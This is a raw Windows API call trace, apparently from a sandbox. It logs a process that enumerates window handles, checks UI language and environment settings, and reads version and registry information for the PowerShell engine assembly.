	[0386.382] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x1214
	[0386.382] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x11ec
	[0386.382] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x11e8
	[0386.382] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x11cc
	[0386.382] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x1140
	[0386.382] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xe6c
	[0386.382] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x6e8
	[0386.382] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xc6c
	[0386.382] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xf94
	[0386.382] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xffc
	[0386.383] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xf74
	[0386.383] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xf08
	[0386.383] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xf0c
	[0386.383] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xed8
	[0386.383] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xe90
	[0386.383] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xea8
	[0386.383] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xfa8
	[0386.383] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xfbc
	[0386.383] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xfb8
	[0386.383] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xfb4
	[0386.383] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xfb0
	[0386.384] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xfac
	[0386.384] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xfc0
	[0386.384] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xfd0
	[0386.385] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xf88
	[0386.385] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xf84
	[0386.385] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xf80
	[0386.385] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xde0
	[0386.385] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xddc
	[0386.385] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xdd8
	[0386.385] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xd34
	[0386.385] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xd10
	[0386.385] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xd0c
	[0386.385] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xc9c
	[0386.385] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xc74
	[0386.386] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xc1c
	[0386.386] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xc08
	[0386.386] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xabc
	[0386.386] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x24c
	[0386.386] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xbb0
	[0386.386] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xbfc
	[0386.386] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb10
	[0386.386] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x374
	[0386.386] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x368
	[0386.387] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb28
	[0386.387] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xae8
	[0386.387] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb14
	[0386.387] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x95c
	[0386.387] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xa8c
	[0386.387] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x46c
	[0386.387] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb3c
	[0386.387] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xa90
	[0386.387] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xad0
	[0386.387] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xa9c
	[0386.388] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xaa0
	[0386.388] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb1c
	[0386.388] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x7e0
	[0386.388] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xa74
	[0386.388] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x694
	[0386.388] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xa28
	[0386.388] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x9b0
	[0386.388] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x8d8
	[0386.388] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x940
	[0386.388] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x93c
	[0386.389] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4ec
	[0386.389] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x150
	[0386.389] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x720
	[0386.389] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x3c4
	[0386.389] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x7d4
	[0386.389] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x6c8
	[0386.389] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb54
	[0386.389] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb54
	[0386.389] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb5c
	[0386.389] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x838
	[0386.390] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x818
	[0386.390] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x5b8
	[0386.390] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x494
	[0386.390] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x1ec
	[0386.390] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x440
	[0386.390] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x7e8
	[0386.390] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x730
	[0386.390] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x2c8
	[0386.390] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x31c
	[0386.390] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x330
	[0386.390] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x128
	[0386.391] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x5c8
	[0386.391] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x6f8
	[0386.391] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x358
	[0386.391] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x73c
	[0386.391] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0xb0
	[0386.391] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x250
	[0386.391] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x240
	[0386.391] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x790
	[0386.391] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x61c
	[0386.391] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x568
	[0386.391] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x538
	[0386.391] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x540
	[0386.391] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x460
	[0386.392] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x79c
	[0386.392] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x4e0
	[0386.392] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x460
	[0386.392] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xcd920 | out: lpdwProcessId=0xcd920) returned 0x778
	[0386.395] WerSetFlags () returned 0x0
	[0386.401] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0386.759] CoTaskMemFree (pv=0x0) 
	[0386.760] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdc88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdc80 | out: pulNumLanguages=0xcdc88, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdc80) returned 1
	[0386.760] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdc88, pwszLanguagesBuffer=0x2c549c8, pcchLanguagesBuffer=0xcdc80 | out: pulNumLanguages=0xcdc88, pwszLanguagesBuffer=0x2c549c8, pcchLanguagesBuffer=0xcdc80) returned 1
	[0386.766] CoTaskMemAlloc (cb=0x24) returned 0x1ed0c0
	[0386.766] GetUserDefaultLocaleName (in: lpLocaleName=0x1ed0c0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0386.766] CoTaskMemFree (pv=0x1ed0c0) 
	[0386.788] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0386.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0386.788] CoTaskMemFree (pv=0x1ed820) 
	[0386.790] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0386.790] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0386.790] CoTaskMemFree (pv=0x1ed820) 
	[0386.792] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0386.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0386.792] CoTaskMemFree (pv=0x1ed820) 
	[0386.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0386.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0386.802] SetErrorMode (uMode=0x1) returned 0x1
	[0386.802] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd900 | out: lpFileInformation=0xcd900*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0386.802] SetErrorMode (uMode=0x1) returned 0x1
	[0386.802] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdb70 | out: lpdwHandle=0xcdb70) returned 0x94c
	[0387.182] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c58258 | out: lpData=0x2c58258) returned 1
	[0387.183] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdae8, puLen=0xcdae0 | out: lplpBuffer=0xcdae8*=0x2c582f4, puLen=0xcdae0) returned 1
	[0387.183] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcda58, puLen=0xcda50 | out: lplpBuffer=0xcda58*=0x2c583d0, puLen=0xcda50) returned 1
	[0387.183] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0387.183] CoTaskMemAlloc (cb=0x2e) returned 0x1f16c0
	[0387.183] lstrcpyW (in: lpString1=0x1f16c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0387.183] CoTaskMemFree (pv=0x1f16c0) 
	[0387.183] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcda58, puLen=0xcda50 | out: lplpBuffer=0xcda58*=0x2c58424, puLen=0xcda50) returned 1
	[0387.183] lstrlenW (lpString="System.Management.Automation") returned 28
	[0387.183] CoTaskMemAlloc (cb=0x3c) returned 0x1f93c0
	[0387.183] lstrcpyW (in: lpString1=0x1f93c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0387.183] CoTaskMemFree (pv=0x1f93c0) 
	[0387.183] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcda58, puLen=0xcda50 | out: lplpBuffer=0xcda58*=0x2c58480, puLen=0xcda50) returned 1
	[0387.183] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0387.183] CoTaskMemAlloc (cb=0x20) returned 0x1f61e0
	[0387.183] lstrcpyW (in: lpString1=0x1f61e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0387.183] CoTaskMemFree (pv=0x1f61e0) 
	[0387.183] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcda58, puLen=0xcda50 | out: lplpBuffer=0xcda58*=0x2c584c0, puLen=0xcda50) returned 1
	[0387.183] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0387.183] CoTaskMemAlloc (cb=0x44) returned 0x1f93c0
	[0387.183] lstrcpyW (in: lpString1=0x1f93c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0387.183] CoTaskMemFree (pv=0x1f93c0) 
	[0387.183] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcda58, puLen=0xcda50 | out: lplpBuffer=0xcda58*=0x2c58528, puLen=0xcda50) returned 1
	[0387.183] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0387.184] CoTaskMemAlloc (cb=0x76) returned 0x191630
	[0387.184] lstrcpyW (in: lpString1=0x191630, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0387.184] CoTaskMemFree (pv=0x191630) 
	[0387.184] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcda58, puLen=0xcda50 | out: lplpBuffer=0xcda58*=0x2c585c4, puLen=0xcda50) returned 1
	[0387.184] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0387.184] CoTaskMemAlloc (cb=0x44) returned 0x1f93c0
	[0387.184] lstrcpyW (in: lpString1=0x1f93c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0387.184] CoTaskMemFree (pv=0x1f93c0) 
	[0387.184] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcda58, puLen=0xcda50 | out: lplpBuffer=0xcda58*=0x2c58628, puLen=0xcda50) returned 1
	[0387.184] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0387.184] CoTaskMemAlloc (cb=0x58) returned 0x145920
	[0387.184] lstrcpyW (in: lpString1=0x145920, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0387.184] CoTaskMemFree (pv=0x145920) 
	[0387.184] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcda58, puLen=0xcda50 | out: lplpBuffer=0xcda58*=0x2c586a4, puLen=0xcda50) returned 1
	[0387.184] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0387.184] CoTaskMemAlloc (cb=0x20) returned 0x1f61e0
	[0387.184] lstrcpyW (in: lpString1=0x1f61e0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0387.184] CoTaskMemFree (pv=0x1f61e0) 
	[0387.184] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcda58, puLen=0xcda50 | out: lplpBuffer=0xcda58*=0x2c5834c, puLen=0xcda50) returned 1
	[0387.184] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0387.184] CoTaskMemAlloc (cb=0x66) returned 0x1f5410
	[0387.184] lstrcpyW (in: lpString1=0x1f5410, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0387.184] CoTaskMemFree (pv=0x1f5410) 
	[0387.184] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcda58, puLen=0xcda50 | out: lplpBuffer=0xcda58*=0x0, puLen=0xcda50) returned 0
	[0387.184] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcda58, puLen=0xcda50 | out: lplpBuffer=0xcda58*=0x0, puLen=0xcda50) returned 0
	[0387.185] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcda58, puLen=0xcda50 | out: lplpBuffer=0xcda58*=0x0, puLen=0xcda50) returned 0
	[0387.185] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcda28, puLen=0xcda20 | out: lplpBuffer=0xcda28*=0x2c582f4, puLen=0xcda20) returned 1
	[0387.185] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0387.185] VerLanguageNameW (in: wLang=0x0, szLang=0x194120, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0387.185] CoTaskMemFree (pv=0x194120) 
	[0387.185] VerQueryValueW (in: pBlock=0x2c58258, lpSubBlock="\\", lplpBuffer=0xcda78, puLen=0xcda70 | out: lplpBuffer=0xcda78*=0x2c58280, puLen=0xcda70) returned 1
	[0387.193] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0387.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.193] CoTaskMemFree (pv=0x1ed820) 
	[0387.197] CoTaskMemAlloc (cb=0x104) returned 0x1ed820
	[0387.197] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ed820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.197] CoTaskMemFree (pv=0x1ed820) 
	[0387.201] lstrlenW (lpString="䅁") returned 1
	[0387.210] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd948 | out: phkResult=0xcd948*=0x2fc) returned 0x0
	[0387.211] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd938 | out: phkResult=0xcd938*=0x300) returned 0x0
	[0387.211] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd9c8 | out: phkResult=0xcd9c8*=0x304) returned 0x0
	[0387.215] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd90c, lpData=0x0, lpcbData=0xcd908*=0x0 | out: lpType=0xcd90c*=0x1, lpData=0x0, lpcbData=0xcd908*=0x56) returned 0x0
	[0387.216] CoTaskMemAlloc (cb=0x5a) returned 0x1f53a0
	[0387.216] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd8dc, lpData=0x1f53a0, lpcbData=0xcd8d8*=0x56 | out: lpType=0xcd8dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd8d8*=0x56) returned 0x0
	[0387.216] CoTaskMemFree (pv=0x1f53a0) 
	[0387.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0387.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
